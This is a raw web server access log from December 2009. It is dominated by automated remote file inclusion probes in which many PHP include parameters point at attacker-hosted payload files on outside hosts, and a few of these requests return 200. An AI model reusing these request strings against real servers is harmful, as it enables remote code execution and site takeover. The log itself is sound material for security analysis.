66.11.117.195 - - [14/Dec/2009:08:26:22 -0800] "GET /logs/access_080416.log/index2.php?page=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:50 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:50 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:26:50 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:08:26:56 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:27:00 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.144.34 - - [14/Dec/2009:08:27:46 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://peirano.com.ar/hbb.txt?&mode=id HTTP/1.1" 404 - "-" "-" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:07 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:07 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:28:17 -0800] "GET /login.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:28:17 -0800] "GET /logs/access_090724.log//login.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:28:17 -0800] "GET /logs//login.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:19 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.38.136.78 - - [14/Dec/2009:08:28:28 -0800] "GET /logs/access_091122.log//login.php?path=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [14/Dec/2009:08:28:48 -0800] "GET /logs/access_090213.log////index.php?DOCUMENT_ROOT=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:52 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:52 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:52 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [14/Dec/2009:08:28:53 -0800] "GET ///index.php?DOCUMENT_ROOT=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 200 14808 "-" "libwww-perl/5.805" "www.dmulk.com"
208.49.206.117 - - [14/Dec/2009:08:28:54 -0800] "GET /logs////index.php?DOCUMENT_ROOT=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:59 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:59 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:28:59 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:29:02 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:29:13 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:29:27 -0800] "GET /logs/access_080721.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:29:28 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:29:28 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14953 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:30:11 -0800] "GET /logs/access_081110.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:20 -0800] "GET /logs/access_090807.log%20%20/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:20 -0800] "GET /write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:20 -0800] "GET /logs/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:20 -0800] "GET /logs/access_090810.log%20%20/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:21 -0800] "GET /write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:21 -0800] "GET /logs/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:21 -0800] "GET /logs/access_090807.log/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.124.202.155 - - [14/Dec/2009:08:30:29 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://birdbrain.citebot.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.124.202.155 - - [14/Dec/2009:08:30:29 -0800] "GET /logs/access_080517.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://birdbrain.citebot.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
222.124.202.155 - - [14/Dec/2009:08:30:29 -0800] "GET /logs/access_090830.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://birdbrain.citebot.com/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [14/Dec/2009:08:30:30 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
222.124.202.155 - - [14/Dec/2009:08:30:30 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://birdbrain.citebot.com/id.txt?? HTTP/1.1" 200 14893 "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:40 -0800] "GET /logs/access_090810.log/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:45 -0800] "GET /write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:45 -0800] "GET /logs/access_090807.log/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:45 -0800] "GET /logs/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:30:45 -0800] "GET /logs/access_090810.log/write.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
208.49.206.117 - - [14/Dec/2009:08:30:55 -0800] "GET /logs/access_080906.log////index.php?DOCUMENT_ROOT=http://n34.biz/.injek/idtempek.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:31:30 -0800] "GET /logs/access_081110.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:31:45 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:31:45 -0800] "GET /logs/access_090930.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:31:45 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:31:45 -0800] "GET /logs/access_090508.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:32:28 -0800] "GET /logs/access_090511.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:29 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:29 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:29 -0800] "GET /modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:30 -0800] "GET /logs/access_080531.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:32:30 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:32:30 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:32:30 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.254.168.42 - - [14/Dec/2009:08:32:36 -0800] "GET /logs/access_080906.log////?_index.php[DOCUMENT_ROOT]=http://n34.biz/.injek/id23.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:40 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:32:50 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [14/Dec/2009:08:32:50 -0800] "GET /logs/access_080201.log%20%20//modules/vwar/admin/admin.php?vwar__root=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:32:55 -0800] "GET /errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:32:55 -0800] "GET /logs/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:32:55 -0800] "GET /logs/access_090930.log/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:33:03 -0800] "GET /logs/access_090508.log/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:34:51 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:34:51 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:34:51 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:00 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:00 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:00 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:35:02 -0800] "GET /logs/access_090930.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
81.191.133.141 - - [14/Dec/2009:08:35:02 -0800] "GET /logs/access_080321.log%20%20//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://leominsterrazorbacks.com/paifr/fx29id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:35:05 -0800] "GET /logs/access_090930.log%20%20/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:35:05 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:35:05 -0800] "GET /logs/access_090508.log%20%20/errors.php?error=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
74.53.29.34 - - [14/Dec/2009:08:35:10 -0800] "GET /logs/access_080410.log HTTP/1.1" 200 2329617 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1)LookThereItIs.Com/20061010 Firefox/2.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:15 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.spotmerkezi.com/cache/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:27 -0800] "GET /common/db.php?commonpath=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:27 -0800] "GET /logs/access_080609.log%20%20//common/db.php?commonpath=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:27 -0800] "GET /logs//common/db.php?commonpath=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:29 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
119.202.76.160 - - [14/Dec/2009:08:35:32 -0800] "GET /logs/access_090502.log%20%20//common/db.php?commonpath=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:33 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.210.218.88 - - [14/Dec/2009:08:35:35 -0800] "GET /blog/index.php/feed HTTP/1.1" 200 1944 "-" "Rome Client (http://tinyurl.com/64t5n) Ver: 0.9" "dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:35 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:35 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:35 -0800] "GET /logs/access_080410.log//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:36 -0800] "GET /modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:58 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:35:59 -0800] "GET /logs/access_080213.log//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:35:59 -0800] "GET /logs/access_091117.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:00 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:00 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14952 "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:03 -0800] "GET /logs/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:03 -0800] "GET /setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:03 -0800] "GET /logs/access_080427.log/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:07 -0800] "GET /logs/access_090919.log/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:09 -0800] "GET /logs/access_081010.log//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:12 -0800] "GET /logs/access_080427.log%20%20/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:12 -0800] "GET /setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:13 -0800] "GET /logs/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:17 -0800] "GET /logs/access_090919.log%20%20/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:22 -0800] "GET /logs/access_081107.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:22 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 130223 "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:36:23 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 200 14952 "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:53 -0800] "GET /setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:53 -0800] "GET /logs/access_080427.log/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:36:53 -0800] "GET /logs/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:36:54 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:36:55 -0800] "GET /logs/access_080410.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:37:00 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.150.184.140 - - [14/Dec/2009:08:37:01 -0800] "GET /logs/access_090919.log/setup.php?dir_module=http://n34.biz/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [14/Dec/2009:08:37:12 -0800] "GET /logs/access_080213.log%20%20//modules/TotalCalendar/about.php?inc_dir=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [14/Dec/2009:08:37:26 -0800] "GET /logs/access_091117.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:37:29 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:37:29 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
116.50.134.6 - - [14/Dec/2009:08:37:29 -0800] "GET /logs/access_090423.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://lnx.ilchirone.it/public//modules/coppermine/themes/default/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
